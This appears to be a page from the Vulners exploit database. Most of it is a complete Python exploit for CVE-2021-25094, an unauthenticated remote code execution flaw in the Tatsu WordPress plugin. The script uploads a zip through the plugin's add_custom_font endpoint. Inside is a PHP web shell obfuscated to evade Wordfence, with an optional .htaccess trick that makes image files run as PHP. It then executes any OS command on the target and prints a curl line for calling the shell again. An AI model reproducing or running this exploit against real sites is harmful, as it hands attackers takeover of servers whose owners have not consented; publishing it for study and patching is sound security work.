Vulners
Lucene search
Tatsu 3.3.11 - Unauthenticated RCE
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Mephisto | 21 May 202605:06 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Brandexponents Tatsu | 3 Jan 202221:19 | – | githubexploit |
 | CVE-2021-25094 | 25 Apr 202200:00 | – | attackerkb |
 | The vulnerability of the `add_custom_font` function in the Tatsu Builder template editing plugin for WordPress website content management system allows a hacker to execute arbitrary code. | 7 Jun 202200:00 | – | bdu_fstec |
 | CVE-2021-25094 | 17 May 202212:00 | – | circl |
 | WordPress plugin Tatsu 访问控制错误漏洞 | 25 Apr 202200:00 | – | cnnvd |
 | WordPress Tatsu plugin file upload vulnerability | 27 Apr 202200:00 | – | cnvd |
 | WordPress Tatsu Plugin Remote Code Execution (CVE-2021-25094) | 30 May 202200:00 | – | checkpoint_advisories |
 | CVE-2021-25094 | 25 Apr 202215:50 | – | cve |
 | CVE-2021-25094 Tatsu < 3.3.12 - Unauthenticated RCE | 25 Apr 202215:50 | – | cvelist |
10
# Exploit Title:Tatsu 3.3.11 - Unauthenticated RCE
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Product: Tatsu wordpress plugin <= 3.3.11
# CVE: CVE-2021-25094
# URL: https://tatsubuilder.com/
import sys
import requests
import argparse
import urllib3
import threading
import time
import base64
import queue
import io
import os
import zipfile
import string
import random
from datetime import datetime
urllib3.disable_warnings()
class HTTPCaller():
def __init__(self, url, headers, proxies, cmd):
self.url = url
self.headers = headers
self.proxies = proxies
self.cmd = cmd
self.encodedCmd = base64.b64encode(cmd.encode("utf8"))
self.zipname = None
self.shellFilename = None
if self.url[-1] == '/':
self.url = self.url[:-1]
if proxies:
self.proxies = {"http" : proxies, "https" : proxies}
else:
self.proxies = {}
def generateZip(self, compressionLevel, technique, customShell, keep):
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED, False,
compressionLevel) as zipFile:
if technique == "custom" and customShell and os.path.isfile(customShell):
with open(customShell) as f:
shell = f.readlines()
shell = "\n".join(shell)
self.shellFilename = os.path.basename(customShell)
if self.shellFilename[0] != ".":
self.shellFilename = "." + self.shellFilename
zipFile.writestr(self.shellFilename, shell)
elif technique == "php":
# a lazy obfuscated shell, basic bypass Wordfence
# i would change base64 encoding for something better
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".php"
zipFile.writestr(self.shellFilename, shell)
elif technique.startswith("htaccess"):
# requires AllowOverride All in the apache config file
shell = "AddType application/x-httpd-php .png\n"
zipFile.writestr(".htaccess", shell)
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink('.'+'h'+'t'+'a'+'cc'+'e'+'ss');"
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".png"
zipFile.writestr(self.shellFilename, shell)
else:
print("Error: unknow shell technique %s" % technique)
sys.exit(1)
self.zipname = ''.join(random.choice(string.ascii_lowercase) for i in
range(3))
self.zipFile = buffer
def getShellUrl(self):
return "%s/wp-content/uploads/typehub/custom/%s/%s" % (self.url,
self.zipname, self.shellFilename)
def executeCmd(self):
return requests.post(url = self.getShellUrl(), data = {"text":
self.encodedCmd}, headers = self.headers, proxies = self.proxies,
verify=False)
def upload(self):
url = "%s/wp-admin/admin-ajax.php" % self.url
files = {"file": ("%s.zip" % self.zipname, self.zipFile.getvalue())}
return requests.post(url = url, data = {"action": "add_custom_font"},
files = files, headers = self.headers, proxies = self.proxies, verify=False)
def main():
description = "|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress
plugin <= 3.3.8\n"
description += "|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)"
print(description)
print("")
parser = argparse.ArgumentParser()
parser.add_argument("url", help="Wordpress vulnerable URL (example:
https://mywordpress.com/)")
parser.add_argument("cmd", help="OS command to execute")
parser.add_argument('--technique', help="Shell technique: php | htaccess |
custom", default="php")
parser.add_argument('--customShell', help="Provide a custom PHP shell file
that will take a base64 cmd as $_POST['text'] input")
parser.add_argument('--keep', help="Do not auto-destruct the uploaded PHP
shell", default=False, type=bool)
parser.add_argument('--proxy', help="Specify and use an HTTP proxy
(example: http://localhost:8080)")
parser.add_argument('--compressionLevel', help="Compression level of the
zip file (0 to 9, default 9)", default=9, type=int)
args = parser.parse_args()
# Use web browser-like header
headers = {
"X-Requested-With": "XMLHttpRequest",
"Origin": args.url,
"Referer": args.url,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.212 Safari/537.36",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.9"
}
caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)
print("[+] Generating a zip with shell technique '%s'" % args.technique)
caller.generateZip(args.compressionLevel, args.technique,
args.customShell, args.keep)
print("[+] Uploading zip archive to
%s/wp-admin/admin-ajax.php?action=add_custom_font" % (args.url))
r = caller.upload()
if (r.status_code != 200 or not r.text.startswith('{"status":"success"')):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Upload OK")
print("[+] Trigger shell at %s" % caller.getShellUrl())
r = caller.executeCmd()
if (r.status_code != 200):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Exploit success!")
print(r.text)
if args.keep:
print("[+] Call it with:")
print('curl -X POST -d"text=$(echo "{0}" | base64 -w0)"
{1}'.format(args.cmd, caller.getShellUrl()))
else:
print("[+] Shell file has been auto-deleted but parent directory will
remain on the webserver")
print("[+] Job done")
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 3.18.1
EPSS0.83535